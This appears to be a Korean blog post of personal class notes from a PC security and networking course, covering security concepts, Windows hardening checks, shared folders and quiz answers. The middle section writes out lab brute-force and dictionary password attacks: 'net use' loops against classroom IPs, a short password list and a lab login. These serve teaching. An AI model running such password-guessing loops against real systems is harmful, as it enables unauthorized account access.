2024년 12월 21일 토요일

PC보안 보안 가이드 / 윈도우 속도향상, 제원 알아보기 / [정보보호] 정보화시대 필수! 최신 PC 보안 가이드 설정/네트워크 유형설정

◆ 핵심요약

▶IP Address 이해

-Class 주소 체계는 A class, B class, C class, D class로 나눈다.

- 네트워크 주소와 호스트 주소가 결합되어 있다.

- 네트워크 주소와 호스트 주소 구분을 서브넷마스크로 표시한다.

▶ 서브넷팅 이해

-서브넷팅은 브로트캐스트 패킷 양을 줄여 성능과 서비스 관리, 문제 해결을 위한 더 나은 관리 환경을 제공한다.

-호스트 비트를 서브넷 비트로 빌려서 네트워크를 나눈다.

-서브넷팅후에 IP주소 할당은 서브넷마스크값이 달라진다.

▶ 네트워크 통신 흐름 이해

-같은 네트워크 내의 통신은 목적지 IP주소에 대한 MAC Address를 찾아오는 ARP로 시작한다.

-다른 네트워크 와의 통신은 게이트웨이 IP주소에 대한 MAC Address를 찾아오는 ARP가 동작한다.


001. 보안가이드 | 콘텐츠 | 오피스키퍼 - https://www.officekeeper.co.kr/support/guide?utm_campaign=g%5Fkeyword&utm_medium=google%5Fpc%5Fmo&utm_source=cpc&utm_term=%EB%B3%B4%EC%95%88%EC%A0%90%EA%B2%80&gad_source=1&gclid=CjwKCAjw0aS3BhA3EiwAKaD2ZU7wDSSKX_q9ktGZ1rMKG5GfAV0VqTG1MBpPH8NVnosEIEA2XWzFGRoCadcQAvD_BwE

002. [KISA] 내PC돌보미 - PC 보안 가이드 [취약점 관리(Mac)] | System Security Vulnerability - https://ssv.skill.or.kr/kisa-windows-mac-pc-security-guide/kisa-mac-pc-security-vulnerability

003. KISA 한국인터넷진흥원>지식플랫폼>법령·가이드라인>가이드라인>보안취약점 및 침해사고 대응 - https://www.kisa.or.kr/2060204

[[지리산햇빛발전소]趙廷基] [오전 11:33] 보안 취약점 정보 포털 - https://knvd.krcert.or.kr/detailSecNo.do?IDX=5814

- PC 보안, 이거 하나면 끝! <1> 11가지 PC 보안 가이드 : 네이버 블로그 - https://m.blog.naver.com/PostView.naver?blogId=didim365_&logNo=221963563836&proxyReferer=https:%2F%2Fwww.google.com%2F&trackingCode=external

- 보안가이드 | 콘텐츠 | 오피스키퍼 - https://www.officekeeper.co.kr/support/guide?utm_campaign=g%5Fkeyword&utm_medium=google%5Fpc%5Fmo&utm_source=cpc&utm_term=%EB%B3%B4%EC%95%88%EC%A0%90%EA%B2%80&gad_source=1&gclid=Cj0KCQjwurS3BhCGARIsADdUH52_4PhfyNRhA4lN7HI6-WrV4sYYqaQ0L66Tlwck9OqFbJMh5p9WZQEaArcdEALw_wcB

 

뷰인터 HR;- https://viewinterhr.com/certificate/

안전한 저장소

C5, CCCS, CISPE, CPSTIC, DESC CSP, DoD CC SRG, ENS 상위,

FedRAMP
, FINMA, GNS, GSMA, HIPAA BAA, HITRUST CSF, IAR, IRAP, ISMAP, ISO 및 CSA STAR 인증, K-ISMS, MTCS, OSPAR, PCI, Pinakes, PiTuKri, SNI 27001, SOC 등 공인된 인증

기관을 통해 획득할 수 있는 국내외의 다양한 보안 관련 인증을 보유한 저장소를 사용합니다.

기대효과

-PC 보안 가이드 설정을 구현하고 내 PC 돌보미 도구를 활용하여 PC 보안을 강화할 수 있다.

1. Windows 취약점 항목- Windows  취약점 항목 소개와 내PC  돌보미 도구 소개

2. Windows 취약점 관리-  PC 보안 가이드 관리 영역 학습(실습) - 계정관리, 서비스관리, 보안업데이트, 보안 기능관리, 해킹방지 설정 등

================================================

Windows 10을 사용하는 PC의 속도를 향상시키는 10가지 방법

https://www.kingston.com/kr/blog/pc-performance/tips-to-speed-up-windows-10

사용하는 컴퓨터 성능 및 속도를 향상 시켜서 새 pc 처럼 만드는

https://www.google.com/search?client=avast-a-2&q=zjavnxjthreh&oq=zjavnxjthreh&gs_lcrp=EgZjaHJvbWUyBggAEEUYQNIBBTdqMGoxqAIAsAIA&ie=UTF-8#fpstate=ive&vld=cid:b8933f1a,vid:6-YThtQ-eUM,st:0

================================================ 

2024.3.09. 데스크탑 기준(설정<맨 밑의 정보)

1.장치사양 :

장치 이름 지리산愛 햇빛발전소

프로세서 Intel(R) Celeron(R) CPU G1840 @ 2.80GHz 2.80 GHz

설치된 RAM 8.00GB(7.87GB 사용 가능)-양호---> 16기가>

장치 ID 7FFF61DB-1895-434C-9DD5-A7C60DFA7140

제품 ID 00330-80000-00000-AA586

시스템 종류 64비트 운영 체제, x64 기반 프로세서

펜 및 터치 이 디스플레이에 사용할 수 있는 펜 또는 터치식 입력이 없습니다.


2.윈도우 사양에디션 Windows 10 Pro 버전 21H1 설치 날짜 2021-07-10

OS 빌드 19043.4123 경험 Windows Feature Experience Pack 1000.19054.1000.0

 

Windows에서 전송 최적화 캐시를 지우는 방법

https://www.bing.com/search?q=Windows%EC%97%90%EC%84%9C%20%EC%A0%84%EC%86%A1%20%EC%B5%9C%EC%A0%81%ED%99%94%20%EC%BA%90%EC%8B%9C%EB%A5%BC%20%EC%A7%80%EC%9A%B0%EB%8A%94%20%EB%B0%A9%EB%B2%95&form=B00032&ocid=SettingsHAQ-BingIA&mkt=ko-KR

 

임시 폴더가 꽉 차서 발생하는 디스크 공간 부족 오류

디스크 정리를 사용하여 장치에서 공간을 확보했는데도 디스코 공간 부족 오류가 발생한 경우에는 Microsoft Store에서 사용되는 응용 프로그램(.appx) 파일로 임시 폴더가 빠르게 채워질 수 있습니다. 이 문제를 해결하려면 Microsoft Store를 초기화하고 Microsoft Store 캐시를 지운 다음, Windows 업데이트 문제 해결사를 실행해야 합니다.

1. 

Microsoft Store를 초기화하려면 시작 Windows logo Start button > 설정 Gear-shaped Settings icon > 업데이트 및 보안 Circular arrows Sync icon > 문제 해결을 선택한 다음, 스크롤을 내려 목록에서 Windows 스토어 앱을 선택하고 문제 해결사 실행을 선택합니다.

2

Microsoft Store 캐시를 지우려면 Windows 로고 키 Windows logo Start button + R 을 눌러 실행 대화 상자를 열고 wsreset.exe를 입력한 다음 확인을 클릭합니다. 빈 명령 프롬프트 창이 열리고 약 10초 후 창이 닫히면서 Microsoft Store가 자동으로 열립니다.

3

Windows 업데이트를 초기화하려면 시작 Windows logo Start button > 설정 Gear-shaped Settings icon > 업데이트 및 보안 Circular arrows Sync icon > 문제 해결을 선택한 다음, 스크롤을 내려 목록에서 Windows 업데이트를 선택하고 문제 해결사 실행을 선택합니다.

4

컴퓨터를 다시 부팅하고 문제가 계속 발생하는지 확인합니다.

드라이브 공간 늘리기에 대한 자세한 내용을 알아보세요.

---------------------------------------------------------------------------------------------

[정보보호] 정보화시대 필수! 최신 PC 보안 가이드 설정

교육목표-PC 보안 가이드 체크 리스트를 활용하여 Windows 취약점 항목을 파악하고 계정 관리, 서비스 관리, 보안 업데이트, 보안 관리, 해킹 방지 설정을 구현하여 PC 보안을 강화할 수 있다.

PC 보안 - 정보보호 정의~정보자산, 내외부의 위협으로부터 기밀,무결,가용성 유지 관리적, 물리적,기술적 보안대책 마련 

-----------------------

=>정보보호 정의

>정보자산에 대해 내외부의 위협으로부터 기밀성, 무결성, 가용성을 유지하기 위해 관리적, 물리적, 기술적 보안대책을 마련하는것


=>정보보호 목표

>기밀성(Confidentiality):인가된 사용자만 접근해야한다는 원칙-예:암호화,접근제어등

>무결성(Integrity):불법적으로 생성,변경,삭제되지 않도록 보호해야한다는 원칙-예:전자서명,디지털서명등

>가용성(Availability):합법적 사용자가 필요할 때 접근할 수 있도록한다는 원칙-예:백업,이중화등


=>공격의 용어

>취약점:설계, 구현, 설치, 운영상의 문제점으로 인해 시스템이 지니게 되는 보안상의 약점

>위협:자산의 취약점을 이용하여 손실을 발생시키는 행위

>위험:예상되는 위협에 의해 자산에 발생할 손실 가능성


>위험성=자산*취약점*위협


=>정보보호 관리대책

>관리적 보호대책

:정보보호책임자지정, 전담조직구성, 정책, 지침, 규정, 교육등을 확립하고 보안계획을 수립,운영,감사등을 확보하기 위한 대책

>물리적 보호대책

:자연재해나 악의적인 파괴로부터 시스템을 보호하기 위해 재난방지장치, 출입통제, 잠금장치, 추적장치등의 대책

>기술적 보호대책

:데이타, PC, Server, 시스템, 네트워크등 정보시스템 자체 보안을 위한 대책


=>시스템 보안 핵심 AAA

>Authentication 인증:자신의 신원을 증명

>Authorization 인가:자원에 접근 허가 여부

>Accounting 로그:사용자 활동에 대한 기록


목표 : 

confidentiality(인가된 사용자만 접근,접근지역 암호화) /

integredity(불법적적으로 생성되거나 변경 , 삭제되지 않도록 원본 유지증명, 수정, 변경 되지않았음-인감 전자서명 기술), 

availblity (필요 시 365일24시간동안 정보가 제공될 수 있도록 유지- 백업 또는  듀얼 컴터가 동기화, 케이블을 이중화 하는 것)      / 

 

공격의 용어 : 

위협? - 자산의 취약점을 이용하여 손실을 발생시키는 행위

취약점 - 설계, 구현, 설치, 운영상의 문제점- 시스템이 지니게 되는  보안상의 약점

위험 - 예상되는 위협에 의해ㅡ자산에 발생할 손실 가능성

위험성= 자산*취약점*위협의 확율(보안등급, 자산의 가치 평가)


- 정보보호 보완 대책: 

관리적, - - -정보보호 책임자 지정, 전담 조직구성,정책 지침 규정, 교육 등을 확립하고 보안계획을 수힙 운영 , 감사등르 확보하기 위한 대책

물리적,- - - 자연적인 재해 및 악의적인 파괴로 부터 시스템을 보호하기위한 재남 방ㅂ지대책, 출입통제, 잠금, 추적장치 등의 대책

기술적 - - - 데이타, pc, server, 시스템, 네트워크 등 정보시스템 자체 보안을 위한 대책

보안대책 마련


- 시스템 보안 핵심 AAA

    1. https://shepherd44.tistory.com/16

[네트워크 용어] AAA(Authentication Authorization Accounting)

출처: https://shepherd44.tistory.com/16 [shepherd's Blog:티스토리]

1. 인증(Authentication)보안 기능에서, 사람이나 프로세스의 신분을 확인하는 것.

2. 권한부여(Authorization) : 검증된 사용자에게 어떤 수준의 권한과 서비스를 허용하는 것.

3. 계정관리(Accounting) : 사용자의 자원에 대한 사용 정보를 모아서 과금,감사,용량증설,리포팅 등을 실시하는 것. ( TTA에서는 Accounting을 과금이라고 해석했네요. 과금, 계정관리 중 Accounting을 설명하기엔 계정관리쪽이 더 가까운 것 같아서 계정관리로 표시하겠습니다. )

출처: https://shepherd44.tistory.com/16 [shepherd's Blog:티스토리]


국내1호 해커- 김영삼정부, 김재열  [판결] '국내 1호 해커' 김재열 前 KB금융 전무 알선수재 징역3년 법률신문 https://www.lawtimes.co.kr › news 김씨는 1993년 청와대 PC통신 ID를 도용해 은행 전산망에 접속했다가 적발된 고졸 출신 '국내 1호' 해커로 이름이 알려졌다. 2008년 KB국민은행연구소 소장으로 영입됐다.

금융실명제 이전 사건 / 인터넷 웹 상용화 이전 / 은행털이 화 / 소숫점 이하 짜리 / 은행 시스템 접근/ 권한 사칭/ 청와대 비서실 (BBS - 데이콤 관리 )사칭- 메일 , 비번 ? (헌법재판소 시스템 이용 / 재판관의 해외판례 열람 암호할 수 있는 권한 비번 #12345--> 0303 으로~ /  

http://it.ith.kr/chair/cm/cm0612.html

데이콤과 관련된 BBS(전자게시판)에 대한 정보는 다음과 같습니다.
 
  • BBS(bulletin board system)는 전자 게시판을 의미한다.


PASSWORD ? 검색창 \\210.181.144.62

ctrl+alt+del 하고,   ---
검색창에서 cmd - 관리자권한으로 실행 - \\210.181.144.58 로그인 암호변경

for / l %i in (1900,1,2030) do net use \\210.181.144.58 %i / user:administrator


강사  PC 진입방법(검색창에서)
\\210.181.144.62  사용자 이름 user    비밀번호 1234

cmd 입력후 관리자 권한  프롬프트로 실행
또는, 명령프로프트 입력후 선택
  
C:\Windows\System32>ipconfig 엔터--> 확인(상대) 

C:\Windows\System32>ping 210.181.144.38 (상대 수신 여부 확인)






======>암호해킹공격

1. 무차별대입공격
2. 사전대입공격

for /l %i in (1900,1,2030) do net use \\210.181.144.58 %i /user : administrator


\\210.181.144.60

password
1234567890
koreapass
seoulpass
123pass
jejupass
123qwe


for /f %i in (c:\temp\p.text) do net use \\210.181.144.60 %i /user:adnistrator

00. 복원짖점 만들기

Advanced IP Scanner가 모든 네트워크 장치를 보여주고, 공유 폴더에 대한 액세스를 허용하고, 컴퓨터를 원격으로 끌 수도 있게 해줍니다. 무료로 다운로드하십시오.

무료 다운로드

Advanced IP Scanner가 모든 네트워크 장치를 보여주고, 공유 폴더 ...

도움말

Advanced IP Scanner가 모든 네트워크 장치를 보여주고, 공유 폴더 ...



net user %username%


01 로그인 패스워드가 주기적으로 변경

- 로그인 옵션 / ctrl+alt+del
- 무작위 패스워드 대입 공격(Brute Force Attack), 계정잠금
- net user %username%
- net accounts
- net accounts /lockoutthreshold:5
- net user blue 1234 /add
_ 해제할 때 :  net accounts /lockoutthreshold:5:0  으로 한다(계정잠금)
- 컴퓨터관리




GNS3 ? 


We use cookies on this website to make your browsing experience better. By using this site you agree to our use of cookies. To learn more about the cookies we ...

Download GNS3

Download GNS3. Select the installer for your favourite OS ...

Download the GNS3 VM

A lightweight, robust way of creating GNS3 topologies that ...

Software

GNS3 offers an easy way to design and build networks of any size ...

Documentation

GNS3 is used by hundreds of thousands of network engineers ...

Marketplace

We use cookies on this website to make your browsing experience ...
GNS3 : GNS3 프로그램이다. WinPCAP : 네트워크 트래픽을 포착할 수 있는 소프트웨어이다. Npcap으로 교체되면서 설치하지 않는다. Npcap : WinPCAP과 같은 트래픽을 포착 ...
2022. 4. 2. — GNS3 설치는 다음의 순서대로 프로그램을 설치한다. 1. vmware workstation Pro설치. 2. GNS3 다운로드 및 설치. 3. IOSv router 추가.
2021. 7. 22. — Graphical Network Simulator의 약자. 이름의 맞게 GUI를 가지고 있으며 제러미 그로스먼(Jeremy Grossman)이 개발했다. 제작언어는 Python이다.






BLUEMAX CLIENT : 


BLUEMAX CLIENT는 취약점 진단 및 관리 기능 탑재로 모든 IT 자산에 대한 보안 취약점을 자동으로 진단하고 관리합니다.
BLUEMAX CLIENT DOWNLOAD. Client. Windows: Windows Client.
BLUEMAX CLIENT는 사용자 디바이스와 BLUEMAX NGF 간 암호화된 SSL VPN 터널 연결을 제공합니다. 이를 통해 사용자는 회사 내부 자원에 안전하게 접근할 수 있습니다.



03 패스워드 최대/최소 사용기간 설정 점검

- 로컬보안정책


04. 최근 사용한 패스워드 사용 점검

-명령 프롬프트 창에 “net accounts” 입력 > 패스워드 기록 개수 확인
-net accounts /uniquepw:12


05. 화면 보호기 설정 여부 점검 2. 취약점 관리 0

- “화면 보호기 변경” 입력 > “화면 보호기 변경” 항목 클릭



05. Administrator 계정 사용 점검 2. 취약점 관리 0

안전 Administrator 계정을 사용하지 않거나 강화된 패스워드를 사용한 경우 

취약 Guest(임시사용자):사용안함 / = Administrator 계정을 사용하거나 단순 패스워드를 사용한 경우

로그인 

계정 : 대소문자 



07. Guest 계정 사용 점검 2. 취약점 관리 0


08. 사용 안 함 계정 삭제 점검 2. 취약점 관리 0

- net user

- net user blue /del




 1. 검색 버튼 클릭( ) > “lusrmgr.msc” 입력 > “lusrmgr.msc” 항목 클릭

 

09. Windows 자동 로그인 점검 2. 취약점 관리 0

자동 로그인은 사용자가 로그인 화면을 건너뛰고 시스템이 시작될 때 자동으로 로그인할 수 있도록 하는 Windows의 기능입니다. 자동 로그인이 활성화되고 제대로 모니터링되지 않으면 공격자가 사용자 계정 및 중요한 데이터에 대한 액세스 권한을 획득할 수 있습니다

===> *****중요 !!!

1. 검색 버튼 클릭( ) > ”레지스트리 편집기” 입력 > “레지스트리 편집기” 항목 클릭 


2. 레지스트리 위치 이동 : 컴퓨터 > HKEY_LOCAL_MACHINE > Software > Microsoft > Windows NT > CurrentVersion > Winlogon


10. 사용자 공유 폴더 설정 여부 점검

사용자 공유 폴더는 사용자가 만들고 네트워크에서 다른 사람과 공유할 수 있는 폴더이며 민감한 정보를 포함할 수 있습니다. 사용자 공유 폴더 설정을 제대로 하지 않으면 공격자가 사용자 공유 폴더에 대한 액세스 권한을 얻고 이를 사용하여 중요한 데이터를 얻거나 악의적인 작업을 수행함으로써 이 취약점을 악용할 수 있습니다.

-파일탐색기

-컴퓨터관리


=>컴퓨터이름과 IP확인

1. 검색/명령 프롬프트 실행

2. >ipconfig /all


=>공유폴더 만들기

1. 컴퓨터 관리/공유폴더/공유/새공유


=>공유폴더 연결

\\ip

\\컴퓨터이름

\\210.181.144.62

\\305-30


=>공유폴더 중지

>컴퓨터 관리/공유폴더/공유/공유중지


=>컴퓨터이름 변경

제어판/시스템및보안/시스템/pc이름바꾸기


=>공유폴더 연결 사용자확인

>컴퓨터 관리/공유폴더/세션


=>공유폴더 동시 연결 사용자 수 제한 (20개)

- 최대사용자수 초과 에러 발생시

>컴퓨터 관리/공유폴더/세션/세션닫기 or 모든세션닫기


=>공유폴더 연결에 필요한 일반 사용자 계정 생성

>명령 프롬프트/관리자권한 실행

>net user green 1234 /add (계정생성)

>net user (계정확인)

>net user green /del (계정삭제)


\\ip 연결시 사용자 인증(사용자이름:green, 암호:1234)


=>방화벽 보안 설정

>검색/방화벽/방화벽설정또는해제/개인네트워크/허용되는 앱 목록에 있는 연결을 포함하여 모든 들어오는 연결 차단(O)

>검색/방화벽/방화벽설정또는해제/공용네트워크/허용되는 앱 목록에 있는 연결을 포함하여 모든 들어오는 연결 차단(O)



-----------------------------------------------

-공유폴드 만들기 / 컴퓨터관리/공유폴더/공유/새공유


--> 공유폴더연결

\\ip

\\컴퓨터이름

\\210.181.141.62

\\305-30


--->공유폴더 중지 /// 컴퓨터관리/공유폴더/공유/공유중지


---> 컴퓨터이름변경

제어판/시스템및 보안/시스템/pc 이름바꾸기

--->공유폴더 연결 사용자확인

컴퓨터관리/공유폴더/세션


----> 공유폴더 동시 연결 사용자 수 제한 (20개)

최대사용자수 초과 에러 발생시: 컴퓨터관리/공유폴더/세션 /세션닫기 or 모든세션닫기


---> 


- 방화벽 ?  "인트라넷(기업 내부)  -----> 방화벽 <------>    인터넷(외부)"

- 윈도우 방화벽 --->            *<------

- 방화벽 보안설정

>검색/방화벽/빙화벽설정 뜨는 해제/개인네트워크/허용되는 앱 목록에 있는 연결을 포함하여 모든 돌아오는 연결 차단90)


- 공유폴더 연결 , 일반 사용자 계정 생성 

 명령프롬프트/관리자권한실행

net user green 1234 /add

\\ip 연결시 사용자 인증(사용자이름 - green , dkagh 1234

C:\Windows\System32>net user green 1234 /add

명령을 잘 실행했습니다.










검색창에서 명령프롬프트에서 우마우스___ 관리자 권한 가능

- ipconfig

- C:\Windows\System32>ping 8.8.8.8

- ipconfig /all


1. 다음은 정보보호의 목표중 무엇을 설명하는지 쓰세요.

-(가용성        ): 시스템이 지체 없이 동작하도록 합법적 사용자가 서비스 사용을 거절당하지 않도록 하는 것이다.

-(무결성        ): 네트워크를 통하여 송수신되는 정보의 내용이 불법적으로 생성 또는 변경되거나 삭제되지 않도록 보호되어야 하는 성질을 말한다.

-(기밀성        ): 오직 인가된 사람, 인가된 프로세스, 인가된 시스템만이 알 필요성에 근거하여 시스템에 접근해야한다는 원칙이다.


2. 정보보호관리의 3가지 보호대책으로 무엇을 설명하는지 쓰세요.

-(관리적 보호대책      ):법, 제도, 규정, 교육등을 확립하고 보안계획을 수립하고 이를 운영하며 위험분석 및 감사를 시행하여 안정성과 신뢰성을 확보하기 위한 대책이다.

-(물리적 보호대책      ):자연재해나 악의적인 파괴로부터 정보시스템을 보호하기 위한 출입통제, 잠금장치, 재난방지장치등의 대책이다.

-(기술적 보호대책      ):접근통제, 암호기술, 백업체제등 정보시스템 자체에 보안성을 강화하여 소프트웨어를 사용하는 등의 대책이다. 


3. 다음에 설명은 무엇인가요?

-(취약점      ): 기능 설계, 구현단계의 오류나 설치 운용상의 문제점으로 인해 시스템이 지니게 되는 보안상의 약점

-(위협      ): 자산의 취약점을 이용하여 자산의 손실을 발생시키는 원인

-(위험      ): 예상되는 위협에 의해 자산에 발생할 가능성이 있는 손실의 정도


4. 다음 공격은 무엇을 설명하는가요?

(무차별대입공격):시스템 또는 서비스의 ID, 패스워드에 대해서 도구를 이용하여 ID, 패스워드를 자동 조합하여 크랙하는 공격

(사전대입공격):시스템 또는 서비스의 ID, 패스워드에 대해서 도구를 이용하여 ID, 패스워드를 크랙하기 위해서 ID와 패스워드가 될 가능성이 있는 단어를 사전파일로 만들어놓고 사전파일의 단어를 대입하여 크랙하는 공격


5. 시스템 보안을 위한 AAA는 시스템 운영의 핵심으로 이것은 무엇인가요?

(Authentication 인증   ):자신의 신원을 증명하는 것

(Authorization 인가   ):자원에 대한 접근 허가여부

(Accouting 로그 ):시스템에 기록을 남겨 관리


6. 윈도우에 사용자계정의 최대암호사용기간을 변경하는 명령은 무엇인가요?

>net accounts /maxpwage:90


7.  공유폴더 연결 사용자를 확인하기 위한 도구는 무엇인가요? 

>- 세션


8. 윈도우를 악성코드 설치 이전으로 복원하기 위한 도구는 무엇인가요? 

>시스템 속성 /시스템 복원


9. 윈도우에 네트워크로 모든 연결을 차단하기 위한 침입 차단 시스템 설정은 무엇인가요?

>방화벽


10. 윈도우에서 웹 서비스 실행 중지를 위한 가장 좋은 방법은 무엇인가요?

> 공유중지, del 사용안함


11. Simple TCP/IP 서비스 실행 점검 2. 취약점 관리 1

Simple TCP/IP 서비스는 네트워크의 장치 간 통신을 가능하게 하는 일련의 프로토콜이며 파일 공유 및 인쇄와 같은 다양한 작업을 수행하는 데 사용할 수 있습니다. Simple TCP/IP 서비스를 사용하는 경우 공격자는 Simple TCP/IP 서비스의 취약점(암호화 또는 인증과 같은 보안 기능을 지원하지 않음)을 악용하고 이를 사용하여 시스템에 대한 무단 액세스 권한을 얻거나 민감한 데이터를 훔치거나 다른 시스템에 대한 공격을 시작할 수 있습니다.



12. 웹 서비스 실행 점검

웹 서비스는 네트워크를 통해 상호 운용할 수 있는 기계 간 상호 작용을 지원하도록 설계된 소프트웨어 시스템입니다. 데이터 검색, 파일 공유 및 원격 액세스와 같은 다양한 작업을 수행하는 데 사용할 수 있습니다. 웹 서비스 실행이 제대로 모니터링되지 않으면 공격자가 웹 서비스의 취약점(Injection, XSS공격 등)을 악용하여 시스템에 대한 무단 액세스 권한을 얻거나 민감한 데이터를 훔치거나 다른 시스템에 대한 공격을 시작할 수 있습니다


13. FTP 서비스 실행 점검

파일 전송 프로토콜(File Transfer Protocol, 이하 FTP)는 인터넷이나 로컬 네트워크를 통해 파일을 전송하는 데 사용되는 표준 프로토콜입니다. FTP 서비스를 사용하는 경우 공격자는 FTP 서비스의 취약점(암호화 또는 인증과 같은 보안 기능을 지원하지 않음)을 악용하여 시스템에 대한 무단 액세스 권한을 얻거나 민감한 데이터를 훔치거나 다른 시스템에 대한 공격을 시작할 수 있습니다


14. SNMP 서비스 설정 여부 점검

Simple Network Management Protocol(이하 SNMP)은 라우터, 스위치 및 서버와 같은 네트워크 장치를 관리하고 관찰하는 데 사용되는 프로토콜입니다. SNMP 서비스는 인증 및 암호화 기능이 취약한 프로토콜입니다. 공격자는 SNMP 메시지를 가로채거나 추가 및 변경을 할 수 있으며, 이를 사용하여 네트워크 장치에 대한 무단 액세스 권한을 얻어 민감한 데이터에 접근이 가능합니다.


15. ICMP 서비스 설정 여부 점검

Internet Control Message Protocol(이하 ICMP)은 네트워크 장치 간의 통신에 사용되는 네트워크 프로토콜입니다. ICMP는 일반적으로 ping 요청, 추적 경로 및 오류 메시지와 같은 진단 및 오류 보고 목적으로 사용됩니다. 공격자는 ICMP 서비스의 취약점을 악용하여 DoS(서비스 거부) 공격, 원격 공격 및 데이터 유출을 할 수 있습니다. 




16. Windows 자동 업데이트 설정 점검

Windows 자동 업데이트는 시스템의 보안과 안정성을 보장하는 데 필수적입니다. 자동 업데이트가 활성화되지 않으면 시스템은 패치되지 않은 취약점을 악용할 수 있는 악성 소프트웨어, 바이러스 및 기타 사이버 위협에 취약해집니다. 공격자는 이러한 취약점을 악용하여 시스템에 대한 무단 액세스 권한을 얻거나 민감한 정보를 훔치거나 다른 시스템에 대한 공격을 시작할 수 있습니다.




17.  운영체제 최신 보안 패치 점검

운영체제 최신 보안 패치가 되어 있지 않으면 새로 발견된 취약점들이 공격받을 수 있어 취약한 상태가 됩니다. 공격자는 최신 보안 패치를 적용하지 않은 시스템을 스캔하여 패치되지 않은 취약점을 쉽게 찾아 악용할 수 있습니다. 패치되지 않은 시스템을 찾으면 취약점을 악용하여 시스템에 액세스하고 악성코드를 설치하고 제어할 수 있습니다.


 

 18. 한글 프로그램의 최신 보안 패치 설치 여부 점검

한글 프로그램에 대한 최신 보안 패치를 확인하지 않으면 새로 발견된 취약점들에 시스템이 취약해집니다. 공격자는 한글 프로그램의 최신 패치를 적용하지 않은 시스템을 스캔하여 프로그램의 취약점을 악용할 수 있습니다. 취약점을 악용할 경우 보안 설정을 우회하여 시스템을 제어하거나 데이터에 접근할 수 있게 됩니다

- 안전 한글 프로그램 최신 보안 패치가 설치된 경우 (한글 프로그램이 설치되어있지 않은 경우도 포함) 취약 한글 프로그램의 최신 보안 패치가 설치되어 있지 않거나 프로그램 버전의 업데이트 지원이 종료된 경우


19. PDF 프로그램의 최신 보안 패치 설치 여부 점검













(문제중심) 디지털전환의 첫걸음! PC 네트워크 기초 실습 / 정보통신용어사전 / 네트워크 해킹

 메모장 - https://n.lrl.kr/ ==> https://lrl.kr/bbs/login.php


◆ 핵심요약

▶IP Address 이해

-Class 주소 체계는 A class, B class, C class, D class로 나눈다.

- 네트워크 주소와 호스트 주소가 결합되어 있다.

- 네트워크 주소와 호스트 주소 구분을 서브넷마스크로 표시한다.

▶ 서브넷팅 이해

-서브넷팅은 브로트캐스트 패킷 양을 줄여 성능과 서비스 관리, 문제 해결을 위한 더 나은 관리 환경을 제공한다.

-호스트 비트를 서브넷 비트로 빌려서 네트워크를 나눈다.

-서브넷팅후에 IP주소 할당은 서브넷마스크값이 달라진다.

▶ 네트워크 통신 흐름 이해

-같은 네트워크 내의 통신은 목적지 IP주소에 대한 MAC Address를 찾아오는 ARP로 시작한다.

-다른 네트워크 와의 통신은 게이트웨이 IP주소에 대한 MAC Address를 찾아오는 ARP가 동작한다.

네트워크 해킹 종류: 네트워크 해킹에는 다양한 종류가 있습니다. 여기 몇 가지 주요 해킹 기법을 소개할게요:

  1. 피싱 (Phishing): 사용자를 속여 민감한 정보를 탈취하는 기법입니다. 이메일, 문자 메시지, 가짜 웹사이트 등을 통해 개인 정보나 금융 정보를 유출시키는 방식으로 진행됩니다.

  2. 악성 코드 (Malware): 컴퓨터 시스템에 해를 끼치기 위해 설계된 소프트웨어입니다. 바이러스, 웜, 트로이 목마 등이 대표적입니다.

  3. SQL 인젝션 (SQL Injection): 웹 애플리케이션의 보안 취약점을 이용해 악의적인 SQL 코드를 주입하는 해킹 기법입니다. 이를 통해 데이터베이스에 접근하거나 조작할 수 있습니다.

  4. 서비스 거부 공격 (DDoS): 다수의 시스템을 동원해 특정 서버나 네트워크를 과부하 상태로 만들어 정상적인 서비스를 방해하는 공격입니다.

  5. 제로데이 공격 (Zero-Day Attack): 소프트웨어의 보안 취약점이 발견된 후, 해당 취약점이 패치되기 전에 이루어지는 공격입니다

  6. 스니핑-스니핑(Snipping)은 네트워크상에서 전송되는 패킷을 캡쳐하여 내용을 엿보는 해킹 기법으로, 도청장치와 비슷합니다. 해커가 네트워크 패킷을 엿보면서 데이터를 도청하는 해킹 유형으로, 웹서버와 이용자 간에 전송되는 개인정보가 유출될 수 있습니다. 

    스니핑을 방지하기 위해서는 웹서버와 이용자 간에 전송되는 모든 패킷을 암호화해야 합니다. 암호화된 상태에서는 패킷을 중간에서 가로채더라도 암호해독이 불가능하여 개인정보를 보호할 수 있습니다. 
  7. DOS- https://www.paloaltonetworks.co.kr/cyberpedia/what-is-a-denial-of-service-attack-dos

  8. 스푸핑- 스푸핑(spoofing)이란, 눈속임(spoof)에서 파생된 IT 용어로, 직접적으로 시스템에 침입을 시도하지 않고 피해자가 공격자의 악의적인 시도에 의한 잘못된 정보, 혹은 연결을 신뢰하게끔 만드는 일련의 기법들을 의미한다. 쉽게 말해서 속임수 혹은 사기죄.

정보통신용어사전- https://terms.tta.or.kr/dictionary/searchList.do?searchContent=conts01&searchRange=all&listCount=10&listPage=1&orderby=KOR_SUBJECT&reFlag=N&orderbyOption=TRUE&conts01WhereSet=&firstWordVal=&firstWord=N&word_seq=&div_big_cd_in=51&div_big_cd=&searchTerm=%EC%8A%A4%ED%91%B8%ED%95%91&searchCate=field


pc 보안 : 

https://draft.blogger.com/blog/post/edit/3102208567829848532/2461414157335243942

디지털전환의 첫걸음! PC 네트워크 기초 실습

디지털 리터러시는 ICT 기술이 고도로 발달한 디지털 사회에서 일의 능률을 높이고 삶을 영위하기 위한 필수적인 역량이 된다. 세계의 선진 국가들은 국민의 디지털 리터러시를 향상시키고 디지털 격차를 해소하기 위해 많은 노력을 수행해왔다. 

본 논문은 이들 중 노인을 포함한 성인의 디지털 리터러시 향상을 위한 미국 공공도서관의 사례를 조사․분석한 것이다. 이를 위해 프로그램 우수 사례 도서관을 중심으로 디지털 리터러시 교육 프로그램 유형, 교육 방식 및 내용 현황을 조사․분석하고 담당사서들과의 인터뷰를 통해 운영 실태를 파악하였다. 

다수의 교육 프로그램이 기본적인 컴퓨터나 인터넷 기술에 관한 것이었고 Micro Office, 이메일, 소셜미디어, 스마트폰이나 태블릿 PC 사용에 관한 교육 프로그램의 비중도 높게 나타났다. 가장 빈번하고 일상적으로 이루어지는 교육 방식은 비공식적인 현장교육이었고 그것의 교육 내용과 수준은 매우 다양하게 나타났다. 

